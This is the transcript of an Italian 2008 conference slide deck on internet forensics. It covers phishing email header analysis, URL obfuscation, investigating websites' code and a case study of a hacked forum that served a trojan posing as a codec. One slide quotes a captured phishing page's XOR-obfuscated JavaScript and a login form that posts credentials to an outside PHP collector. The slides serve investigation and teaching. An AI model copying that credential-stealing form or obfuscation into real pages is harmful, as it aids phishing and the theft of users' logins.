Internet Forensics

Gianni Amato http://www.cfitaly.net 1

INTERNET FORENSICS

di Gianni Amato18/06/2008

Convegno CFItaly – Libera Università degli Studi S. Pio V, Roma

http://www.cfitaly.net/


http://www.cfitaly.net 2Gianni Amato

About me (in breve) Ricercatore indipendente Pentest & Vulnerability Assessment Consulente di sicurezza informatica Collaborazioni

Internet MagazineAssociazione Meter




Internet non ha confini!

Chi crede di rimanere anonimo finché non fornisce i propri dati personali si sbaglia di grosso.




Reati commessi su Internet

Reati commessi mediante Internet

Internet Forensics?




pedopornografia terrorismo phishing frodi ...altre tipologie di reato

diffamazioni, violazione della sfera personale, spam, defacing, intrusioni, malware...

Quali reati?




Individuare e valutare le cause; Analizzare e comprendere le

dinamiche; Documentare e fornire gli indizi;

Iter




Phishing: tutto parte da una (fake) email (?)

Social Engineering ..lo studio del comportamento individuale di

una persona al fine di carpire informazioni.




Generati casualmente Acquistati Bot a caccia di chiocciole

Come recuperano gli indirizzi email?




Vero o falso?

Partiamo dagli headers Percorso (MTA) seguito dall'email per raggiungerci (Recived:)

disposto in ordine inverso Data, ora, protocollo, indirizzo ip

?Oggetto: Eseguiamo la manutenzione delle nostre misure di sicurezzaDa: "Poste italiane" <[email protected]>Rispondi: "Poste italiane" <[email protected]> Data: 29/05/2008 18:26A: [email protected]




DeliveredTo: [email protected]

Received: by 10.142.162.2 with SMTP id k2cs28985wfe;

Thu, 29 May 2008 09:26:09 0700 (PDT)

Received: by 10.86.54.3 with SMTP id c3mr4230fga.55.1212078368105;

Thu, 29 May 2008 09:26:08 0700 (PDT)

ReturnPath: <[email protected]>

Received: from smtp21.orange.fr (smtp21.orange.fr [80.12.242.48])

by mx.google.com with ESMTP id l12si757120fgb.8.2008.05.29.09.26.04;

Thu, 29 May 2008 09:26:08 0700 (PDT)

ReceivedSPF: neutral (google.com: 80.12.242.48 is neither permitted nor denied by best guess record for domain of [email protected]) clientip=80.12.242.48;

AuthenticationResults: mx.google.com; spf=neutral (google.com: 80.12.242.48 is neither permitted nor denied by best guess record for domain of [email protected]) [email protected]

Header




Received: from User (ks3825.kimsufi.com [213.186.40.121])

by mwinf2114.orange.fr (SMTP Server) with ESMTP id AB8AC1C0011C;

Thu, 29 May 2008 18:26:03 +0200 (CEST)

XMEUUID: [email protected]

From: "Poste italiane" <[email protected]>

Subject: Eseguiamo la manutenzione delle nostre misure di sicurezza

Date: Thu, 29 May 2008 18:26:03 +0200

MIMEVersion: 1.0

ContentType: text/html;

charset="Windows1251"

ContentTransferEncoding: 7bit

XPriority: 3

XMSMailPriority: Normal

XMailer: Microsoft Outlook Express 6.00.2600.0000

XMimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

MessageId: <[email protected]>

Header




whois traceroute blacklist

http://mxtoolbox.com/blacklists.aspx

Interrogare i server, i motori di ricerca e le blacklists




Criminali furbi

Fake headers Proxy anonimi (HTTP Proxy, SOCKS, ecc.) Relay aperti (SMTP) Reti WiFi aperte o poco protette Botnet




Url encoding http://www.sitoweb.it/?url=sitotarget.it http://www.sitoweb.it/?url=%67%6F%6F%67%6C%...... IP : 22.22.22.22 Octal : 0026.0026.0026.0026 Hex : 0x16.0x16.0x16.0x16 Dotless: 370546198




Analisi di un sito web

Analisi preliminare Analisi del codice Indagini temporali Indagini avanzate




Analisi preliminare Navigare e catalogare il sito Individuare i collegamenti relativi

es. css e script esterni Il codice fa la differenza




Fake <iframe>

code injection

xssSfruttare le vulnerabilità dei siti web per iniettare codice arbitrario

Analisi preliminare




Fake

Analisi preliminare




Analisi del codice Scaricare il codice sorgente in locale

Browser (Firefox, Opera, Internet Explorer) Amaya Wget

wget m k http://www.sitoweb.it

n.b. fare attenzione ai limiti di banda




Analisi del codice Interpretare la struttura del codice

Codice lungo e poco ordinato Meccanica incomprensibile

soprattutto se il codice è offuscato Link, tag e formattazioni




Escape e Unescape; Base64; 1000 modi per inventarsi una funzione di

codifica;

Analisi del codiceJavascript




Ok, ora è tutto chiaro !?

Analisi del codice




Analisi del codice

Commento <!hppage status”protected”>

Esiste sempre un punto di partenza document.write(unescape(“%3C%53%43...




<SCRIPT LANGUAGE="JavaScript"><!hp_ok=true;function hp_d01(s){if(!hp_ok)return;var o="",ar=new Array(),os="",ic=0;for(i=0;i<s.length;i++){c=s.charCodeAt(i);if(c<128)c=c^2;os+=String.fromCharCode(c);if(os.length>80){ar[ic++]=os;os=""}}o=ar.join("")+os;document.write(o)}//></SCRIPT>

<form name="Form_Auth" action="http://www.biohasardz.com/memo/images/1.php" method="post">...........

script code

Credential Stealer

Analisi del codice




Analisi del codice Individuare (se presenti) i metadati

alcuni software utilizzati per lo sviluppo delle pagine web aggiungono informazioni al codice

Nome del programma utilizzato Il nome dell'autore autore Numero di revisioni Data e ora




<!DOCTYPE HTML PUBLIC "//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD>

<META HTTPEQUIV="CONTENTTYPE" CONTENT="text/html; charset=utf8"><TITLE></TITLE><META NAME="GENERATOR" CONTENT="OpenOffice.org 2.3 (Linux)"><META NAME="AUTHOR" CONTENT="guelfoweb"><META NAME="CREATED" CONTENT="20080614;18464300"><META NAME="CHANGEDBY" CONTENT="guelfoweb"><META NAME="CHANGED" CONTENT="20080614;18472200"><STYLE TYPE="text/css"><!

@page { size: 21cm 29.7cm; margin: 2cm }P { marginbottom: 0.21cm }

></STYLE>

</HEAD><BODY LANG="itIT" DIR="LTR"><P STYLE="marginbottom: 0cm">questa è una pagina web</P></BODY></HTML>

Analisi del codice




Analisi del codice Indizi da non trascurare

Errori Commenti Istruzioni commentate

Possono fornire importanti informazioni!




Indagine temporale

The Wayback Machine archive.org

Google Cache

Evoluzione del sito e vecchi contenuti




Indagine avanzata Directory listings Hidden directories Hidden files Hidden subdomains




Indagine avanzata




Le direttive del file robots.txt invita gli spiders dei motori di ricerca a non

leggere o non indicizzare determinate pagine web;

aiuta gli investigatori a individuare i contenuti che il webmaster ha scelto, per qual si voglia motivo, di tenere nascosti;

Indagine avanzata




Non utilizzare tools aggressivi che potrebbero compromettere il sistema e di conseguenza infangare le prove

Indagine avanzata




Case history

Dalla pedopornografia al virus passando per un forum.

Associazione Meter – Don Fortunato Di Noto




Case history

All'interno del forum del sito web (xxx), oggetto di indagine, sono state rilevate immagini a carattere pornografico e pedopornografico





Case history

Dalle indagini è emerso che il forum era stato abbandonato da quasi 3 anni; era stato compromesso sfruttando una

vulnerabilità nota della piattaforma di gestione; erano state inserite delle keywords per scalare

posizione nei motori di ricerca;





Case history

Dalle indagini è emerso che la presenza di immagini pornografiche e

pedopornografiche era solo un pretesto per invitare l'utente a cliccarci sopra e scaricare un trojan che si spacciava per un codec;

il trojan implementava funzionalità di backdoor che consentiva ai criminali di creare un botnet;





Case history

Dalle indagini è emerso che il trojan risiedeva su un server straniero; una volta infettata la macchina, il trojan

comunicava con diversi siti su server stranieri; le date di registrazione dei siti coincidevano o

differivano di qualche giorno;





Case history

Tra il 2007 e 2008 sono stati individuati 15 casi analoghi

Principali vittime: Comuni Scuole Università





CONTATTI

Gianni Amato http://www.gianniamato.it

EMail: [email protected]. +393202842382



Internet Forensics

Technology

Transcript of Internet Forensics